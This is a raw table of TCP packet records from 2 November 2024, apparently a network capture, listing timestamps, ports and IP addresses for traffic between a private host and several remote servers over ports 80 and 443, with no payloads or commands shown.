Nov 2, 2024 17:56:56.107062101 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.107105017 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.107139111 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.107145071 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.107214928 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.107225895 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.107261896 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.107322931 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.107333899 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.107345104 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.107368946 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.107382059 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.109599113 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.109649897 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.109662056 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.109674931 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.109719038 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.109781027 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.109792948 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.109863043 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.152833939 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.152885914 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.152896881 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.152930021 CET	443	49973	20.42.65.85	192.168.2.7
Nov 2, 2024 17:56:56.152935028 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.153002977 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.153016090 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.153058052 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.153815985 CET	49973	443	192.168.2.7	20.42.65.85
Nov 2, 2024 17:56:56.153899908 CET	443	49973	20.42.65.85	192.168.2.7
Nov 2, 2024 17:56:56.154027939 CET	49973	443	192.168.2.7	20.42.65.85
Nov 2, 2024 17:56:56.155183077 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.155298948 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.168853045 CET	443	49974	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:56.170015097 CET	49974	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:56.170047045 CET	443	49974	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:56.171726942 CET	49974	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:56.171734095 CET	443	49974	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:56.171775103 CET	49974	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:56.171785116 CET	443	49974	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:56.181252003 CET	443	49978	20.42.65.85	192.168.2.7
Nov 2, 2024 17:56:56.181507111 CET	49978	443	192.168.2.7	20.42.65.85
Nov 2, 2024 17:56:56.181521893 CET	443	49978	20.42.65.85	192.168.2.7
Nov 2, 2024 17:56:56.182602882 CET	443	49978	20.42.65.85	192.168.2.7
Nov 2, 2024 17:56:56.182676077 CET	49978	443	192.168.2.7	20.42.65.85
Nov 2, 2024 17:56:56.182959080 CET	49978	443	192.168.2.7	20.42.65.85
Nov 2, 2024 17:56:56.183034897 CET	443	49978	20.42.65.85	192.168.2.7
Nov 2, 2024 17:56:56.183114052 CET	49978	443	192.168.2.7	20.42.65.85
Nov 2, 2024 17:56:56.183156013 CET	49978	443	192.168.2.7	20.42.65.85
Nov 2, 2024 17:56:56.183185101 CET	443	49978	20.42.65.85	192.168.2.7
Nov 2, 2024 17:56:56.184355974 CET	443	49980	23.198.7.174	192.168.2.7
Nov 2, 2024 17:56:56.186271906 CET	49980	443	192.168.2.7	23.198.7.174
Nov 2, 2024 17:56:56.186299086 CET	443	49980	23.198.7.174	192.168.2.7
Nov 2, 2024 17:56:56.186639071 CET	443	49980	23.198.7.174	192.168.2.7
Nov 2, 2024 17:56:56.190370083 CET	49980	443	192.168.2.7	23.198.7.174
Nov 2, 2024 17:56:56.190440893 CET	443	49980	23.198.7.174	192.168.2.7
Nov 2, 2024 17:56:56.203289986 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.203356028 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.203367949 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.203416109 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.203481913 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.203494072 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.203505039 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.203519106 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.203528881 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.203552008 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.203567028 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.203615904 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.203625917 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.203660965 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.203741074 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.203752995 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.203764915 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.203784943 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.203797102 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.203816891 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.203845978 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.203857899 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.203870058 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.203902006 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.203919888 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.203954935 CET	443	49979	20.42.65.85	192.168.2.7
Nov 2, 2024 17:56:56.204086065 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.204097986 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.204108953 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.204157114 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.204221010 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.204247952 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.204284906 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.204288006 CET	49979	443	192.168.2.7	20.42.65.85
Nov 2, 2024 17:56:56.204302073 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.204307079 CET	443	49979	20.42.65.85	192.168.2.7
Nov 2, 2024 17:56:56.204314947 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.204358101 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.204437971 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.204458952 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.204472065 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.204483986 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.204483986 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.204504013 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.204514980 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.204638004 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.204648972 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.204659939 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.204688072 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.204699039 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.204823971 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.204865932 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.204883099 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.204895020 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.204938889 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.205017090 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.205028057 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.205039978 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.205065966 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.205108881 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.205121040 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.205132961 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.205178022 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.205323935 CET	443	49979	20.42.65.85	192.168.2.7
Nov 2, 2024 17:56:56.205385923 CET	49979	443	192.168.2.7	20.42.65.85
Nov 2, 2024 17:56:56.205720901 CET	49979	443	192.168.2.7	20.42.65.85
Nov 2, 2024 17:56:56.205784082 CET	443	49979	20.42.65.85	192.168.2.7
Nov 2, 2024 17:56:56.206008911 CET	49979	443	192.168.2.7	20.42.65.85
Nov 2, 2024 17:56:56.206017971 CET	443	49979	20.42.65.85	192.168.2.7
Nov 2, 2024 17:56:56.206057072 CET	49979	443	192.168.2.7	20.42.65.85
Nov 2, 2024 17:56:56.206070900 CET	443	49979	20.42.65.85	192.168.2.7
Nov 2, 2024 17:56:56.228413105 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.228457928 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.228470087 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.228502035 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.228516102 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.228589058 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.228600025 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.228641987 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.234872103 CET	49978	443	192.168.2.7	20.42.65.85
Nov 2, 2024 17:56:56.234884024 CET	443	49978	20.42.65.85	192.168.2.7
Nov 2, 2024 17:56:56.234920979 CET	49980	443	192.168.2.7	23.198.7.174
Nov 2, 2024 17:56:56.250524998 CET	49979	443	192.168.2.7	20.42.65.85
Nov 2, 2024 17:56:56.281773090 CET	49978	443	192.168.2.7	20.42.65.85
Nov 2, 2024 17:56:56.298718929 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.303922892 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.323604107 CET	49988	443	192.168.2.7	20.42.65.85
Nov 2, 2024 17:56:56.323668003 CET	443	49988	20.42.65.85	192.168.2.7
Nov 2, 2024 17:56:56.323934078 CET	49988	443	192.168.2.7	20.42.65.85
Nov 2, 2024 17:56:56.324131012 CET	49988	443	192.168.2.7	20.42.65.85
Nov 2, 2024 17:56:56.324146986 CET	443	49988	20.42.65.85	192.168.2.7
Nov 2, 2024 17:56:56.378808975 CET	443	49979	20.42.65.85	192.168.2.7
Nov 2, 2024 17:56:56.386617899 CET	49979	443	192.168.2.7	20.42.65.85
Nov 2, 2024 17:56:56.386674881 CET	443	49979	20.42.65.85	192.168.2.7
Nov 2, 2024 17:56:56.386725903 CET	49979	443	192.168.2.7	20.42.65.85
Nov 2, 2024 17:56:56.390388012 CET	443	49978	20.42.65.85	192.168.2.7
Nov 2, 2024 17:56:56.390827894 CET	49978	443	192.168.2.7	20.42.65.85
Nov 2, 2024 17:56:56.390885115 CET	443	49978	20.42.65.85	192.168.2.7
Nov 2, 2024 17:56:56.391052961 CET	443	49978	20.42.65.85	192.168.2.7
Nov 2, 2024 17:56:56.391057968 CET	49978	443	192.168.2.7	20.42.65.85
Nov 2, 2024 17:56:56.391130924 CET	49978	443	192.168.2.7	20.42.65.85
Nov 2, 2024 17:56:56.511763096 CET	443	49981	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:56.512465000 CET	49981	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:56.512480974 CET	443	49981	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:56.512917995 CET	49981	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:56.512923002 CET	443	49981	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:56.528599977 CET	443	49974	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:56.528619051 CET	443	49974	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:56.528702021 CET	49974	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:56.528738976 CET	443	49974	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:56.529135942 CET	49974	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:56.529158115 CET	443	49974	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:56.529166937 CET	49974	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:56.529292107 CET	443	49974	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:56.529325962 CET	443	49974	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:56.529373884 CET	49974	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:56.575962067 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.575985909 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.575999022 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.576040030 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.576040030 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.576122999 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.576136112 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.576150894 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.576203108 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.576312065 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.576324940 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.576337099 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.576364994 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.576395035 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.576452971 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.576464891 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.576483965 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.576497078 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.576502085 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.576508999 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.576538086 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.576559067 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.576755047 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.576796055 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.576817989 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.576828957 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.576880932 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.577061892 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.577228069 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.577275038 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.577697039 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.577759027 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.577776909 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.577790022 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.577840090 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.577867985 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.577881098 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.577923059 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.577982903 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.578057051 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.578067064 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.578078032 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.578111887 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.578136921 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.578150034 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.578160048 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.578197956 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.582906961 CET	443	49982	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:56.593934059 CET	443	49983	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:56.603919029 CET	49982	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:56.603939056 CET	443	49982	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:56.604406118 CET	49982	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:56.604412079 CET	443	49982	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:56.605350971 CET	49983	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:56.605365038 CET	443	49983	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:56.605792999 CET	49983	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:56.605798960 CET	443	49983	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:56.606368065 CET	49989	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:56.606420040 CET	443	49989	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:56.606493950 CET	49989	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:56.607121944 CET	49989	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:56.607140064 CET	443	49989	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:56.607551098 CET	49990	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:56.607583046 CET	443	49990	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:56.607650995 CET	49990	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:56.607805967 CET	49990	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:56.607819080 CET	443	49990	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:56.642433882 CET	443	49981	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:56.642458916 CET	443	49981	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:56.642524958 CET	49981	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:56.642535925 CET	443	49981	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:56.642575979 CET	443	49981	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:56.642642975 CET	49981	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:56.642831087 CET	49981	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:56.642842054 CET	443	49981	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:56.642853022 CET	49981	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:56.642858028 CET	443	49981	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:56.650341988 CET	49991	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:56.650391102 CET	443	49991	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:56.650468111 CET	49991	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:56.650605917 CET	49991	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:56.650623083 CET	443	49991	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:56.695183039 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.695252895 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.695265055 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.695277929 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.695295095 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.695363045 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.695363045 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.695374966 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.695389986 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.695441008 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.695528984 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.695542097 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.695554972 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.695574999 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.695611954 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.695647001 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.695766926 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.695817947 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.695830107 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.695863008 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.695885897 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.695915937 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.695976973 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.695988894 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.696019888 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.696048021 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.696146011 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.696157932 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.696170092 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.696182966 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.696190119 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.696233034 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.696368933 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.696381092 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.696393013 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.696428061 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.696444988 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.696594000 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.696607113 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.696619987 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.696633101 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.696650028 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.696676970 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.696881056 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.696932077 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.696937084 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.696944952 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.696988106 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.697108030 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.697119951 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.697133064 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.697146893 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.697179079 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.697210073 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.697362900 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.697375059 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.697386026 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.697434902 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.697457075 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.697554111 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.697566986 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.697602987 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.697628021 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.697685003 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:56.697726011 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:56.716176987 CET	443	49985	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:56.725824118 CET	49985	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:56.725863934 CET	443	49985	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:56.726399899 CET	49985	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:56.726404905 CET	443	49985	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:56.730046034 CET	443	49982	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:56.730070114 CET	443	49982	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:56.730114937 CET	443	49982	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:56.730125904 CET	49982	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:56.730166912 CET	49982	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:56.730293989 CET	49982	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:56.730309010 CET	443	49982	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:56.730318069 CET	49982	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:56.730324030 CET	443	49982	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:56.733716011 CET	443	49983	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:56.733762980 CET	443	49983	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:56.733820915 CET	443	49983	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:56.733829021 CET	49983	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:56.733863115 CET	49983	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:56.733984947 CET	49983	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:56.733994961 CET	443	49983	13.107.246.45	192.168.2.7
